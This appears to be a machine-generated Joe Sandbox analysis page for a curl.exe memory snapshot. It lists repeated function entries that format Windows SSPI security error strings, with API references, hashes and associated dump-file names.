Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_SECURITY_QOS_FAILED
API String ID: 1435330505-538001202
Opcode ID: c5142b3c6c68b094214a02388c670e5535dc34376c361a479a40382bec39f358
Instruction ID: b963ca384ad4dfa775e3030e9f96811cb01e562bf428a8b7587dc29cfb65e426
Opcode Fuzzy Hash: c5142b3c6c68b094214a02388c670e5535dc34376c361a479a40382bec39f358
Instruction Fuzzy Hash: 25112A35B14B4096E6619F20E4047DF7365F788B51F85413AEA8A42B96DF3CCA4BC750

Function 000000013F49EE85 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059
SEC_E_SHUTDOWN_IN_PROGRESS, xrefs: 000000013F49EE85

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_SHUTDOWN_IN_PROGRESS
API String ID: 1435330505-1032945330
Opcode ID: db9b025f20f5e3e95b701f7726f4fe184dcb8ec2068971865a8eeaa487dc1b52
Instruction ID: bbbf02625a5fa7b1a68eec62ba69e35e70644b77ac15280aa0573e5e985a9ff9
Opcode Fuzzy Hash: db9b025f20f5e3e95b701f7726f4fe184dcb8ec2068971865a8eeaa487dc1b52
Instruction Fuzzy Hash: E6112A35B14B4096E6619F20E4047DF7365F788B51F85413AEA8A43B96DF3CCA4BC750

Function 000000013F49EE9D Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

SEC_E_SMARTCARD_CERT_REVOKED, xrefs: 000000013F49EE9D
%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_SMARTCARD_CERT_REVOKED
API String ID: 1435330505-2367886648
Opcode ID: a9814ed6d2a1dd476941d2b209b762dd06d41defb7f0ac291e2fe5d3431fa7e8
Instruction ID: 8b4352d9d0e4fff96ca7bd86ac8a5df75e1e7f33486e1a2393b129113ebe9265
Opcode Fuzzy Hash: a9814ed6d2a1dd476941d2b209b762dd06d41defb7f0ac291e2fe5d3431fa7e8
Instruction Fuzzy Hash: 67115A31B14B4086E6619F20E4047DF7365F788B51F80413AEA8E42B96DF3CCA4BC710

Function 000000013F49EE91 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

SEC_E_SMARTCARD_CERT_EXPIRED, xrefs: 000000013F49EE91
%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_SMARTCARD_CERT_EXPIRED
API String ID: 1435330505-701404350
Opcode ID: 14c84530406cea2f6ad1a96f663cbcf1d189fe7144d7c026bdadac13e44c029f
Instruction ID: 23c5cc09f21fd15f8865f3a53e948378e01a1b6164ef37cf99cf46adf1c530dd
Opcode Fuzzy Hash: 14c84530406cea2f6ad1a96f663cbcf1d189fe7144d7c026bdadac13e44c029f
Instruction Fuzzy Hash: 16112A35B14B4096E6619F20E4047DF7365F788B51F85413AEA8A42B96DF3CCA4BC750

Function 000000013F49ED29 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

SEC_E_ISSUING_CA_UNTRUSTED_KDC, xrefs: 000000013F49ED29
%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_ISSUING_CA_UNTRUSTED_KDC
API String ID: 1435330505-1164189158
Opcode ID: d6fdd00396279cafc7e921ad01c17cb7e8f560e99260aecc5d2f6ecaa636a8f4
Instruction ID: c6efdda59c962893fec6eac4fa956f00b25ef016479c9aebd089d6dec9715b02
Opcode Fuzzy Hash: d6fdd00396279cafc7e921ad01c17cb7e8f560e99260aecc5d2f6ecaa636a8f4
Instruction Fuzzy Hash: 85115A31B14B4086E6619F20E4047DF7365F788B91F80413AEA8A42B96DF3CCA4BC710

Function 000000013F49ED35 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059
SEC_E_KDC_CERT_EXPIRED, xrefs: 000000013F49ED35

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_KDC_CERT_EXPIRED
API String ID: 1435330505-3011920606
Opcode ID: f2eaa38f4bdb51e9d98bf4c94020deb6bee76419868caccc4ec89c7b18a03b11
Instruction ID: cb6fd7098749bcec6d38c22a7c719d4c0c07df8f4eb9497b74d4273c19614382
Opcode Fuzzy Hash: f2eaa38f4bdb51e9d98bf4c94020deb6bee76419868caccc4ec89c7b18a03b11
Instruction Fuzzy Hash: 84115A35B14B4086E661DF20E4047DF7365F788B51F80413AEA8A42B96DF3CCA4BC710

Function 000000013F49ED4D Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059
SEC_E_KDC_INVALID_REQUEST, xrefs: 000000013F49ED4D

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_KDC_INVALID_REQUEST
API String ID: 1435330505-4043682555
Opcode ID: 5b100ee6c80bd475dd4efe02c8c1e52e4cb1157a3b8d4765f2ae338aa4e90b31
Instruction ID: 4e8967f77c6e8d9c670b57b3d6eb70b1884159043c87465f2f49f6edb1d6f2c3
Opcode Fuzzy Hash: 5b100ee6c80bd475dd4efe02c8c1e52e4cb1157a3b8d4765f2ae338aa4e90b31
Instruction Fuzzy Hash: AE115A35B14B4086E6619F20E4147DF7365FB88B51F80413AEA8A42B96DF3CCA4BC710

Function 000000013F49ED41 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

SEC_E_KDC_CERT_REVOKED, xrefs: 000000013F49ED41
%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_KDC_CERT_REVOKED
API String ID: 1435330505-392938328
Opcode ID: 31050e1a7bab2b163812165b7f916e594586f4ea9503c75469ba3fa8aa7768b5
Instruction ID: 4929beafefa8de19fca4772c97393ea9e5aa085ac2ce38052350fd7777768868
Opcode Fuzzy Hash: 31050e1a7bab2b163812165b7f916e594586f4ea9503c75469ba3fa8aa7768b5
Instruction Fuzzy Hash: 6D112A35B14B4096E6619F20E4047DF7365F788B51F85413AEA8A42B96DF3CCA4BC750

Function 000000013F49ED59 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059
SEC_E_KDC_UNABLE_TO_REFER, xrefs: 000000013F49ED59

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_KDC_UNABLE_TO_REFER
API String ID: 1435330505-1677429073
Opcode ID: b23b7420c7e163b49ed81d033c24075b049a41e11dc10c77c8544a8578a14ffa
Instruction ID: 3a722ce52017104019dc6f4d7bcfc803e06324865eae21e9621220a9eef5f7f5
Opcode Fuzzy Hash: b23b7420c7e163b49ed81d033c24075b049a41e11dc10c77c8544a8578a14ffa
Instruction Fuzzy Hash: 47115A35B14B4086E6619F20E4047DF7365F788B51F80413AEA8A43B96DF3CCA4BC710

Function 000000013F49ECED Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

SEC_E_INTERNAL_ERROR, xrefs: 000000013F49ECED
%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_INTERNAL_ERROR
API String ID: 1435330505-2974677361
Opcode ID: b73027b0e82c3415a1cc19ac55154d864395068921df4522c0e00a430fab6bcd
Instruction ID: 5a3e64d8d16049f90919e083c4a9f274b8b00462f9face9b2776a3f68a751cd6
Opcode Fuzzy Hash: b73027b0e82c3415a1cc19ac55154d864395068921df4522c0e00a430fab6bcd
Instruction Fuzzy Hash: B4112A35B14B4096E6619F20E4047DF7365F788B51F85413AEA8A42B96DF3CCA4BC750

Function 000000013F49ECE1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

SEC_E_INSUFFICIENT_MEMORY, xrefs: 000000013F49ECE1
%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_INSUFFICIENT_MEMORY
API String ID: 1435330505-672193982
Opcode ID: 67e681bb56680d3b8d4935495d36cd04192940dde4f6866a3a85344a5c4baf2d
Instruction ID: 99afb9f00827ee4fc20be52d7d3fd4eafff99d7e7133603f6e0534d150d7562e
Opcode Fuzzy Hash: 67e681bb56680d3b8d4935495d36cd04192940dde4f6866a3a85344a5c4baf2d
Instruction Fuzzy Hash: C8115A35B14B4086E6619F20E4047DF7365F788B51F80413AEA8E42B96DF3CCA4BC710

Function 000000013F49ECF9 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059
SEC_E_INVALID_HANDLE, xrefs: 000000013F49ECF9

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_INVALID_HANDLE
API String ID: 1435330505-4021695947
Opcode ID: 1ccc7f8e97859bc73aa3f76700d79d4a1207450ed5b12cbe54713aae9eb2eb59
Instruction ID: c57a7f901f61ab5644e130bf33ac48727a41107a5ceec522a1267d8d2b8355aa
Opcode Fuzzy Hash: 1ccc7f8e97859bc73aa3f76700d79d4a1207450ed5b12cbe54713aae9eb2eb59
Instruction Fuzzy Hash: 48112A35B14B4096E6619F20E4047DF7365F788B51F85413AEA8A42B96DF3CCA4BC750

Function 000000013F49ED05 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

SEC_E_INVALID_PARAMETER, xrefs: 000000013F49ED05
%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

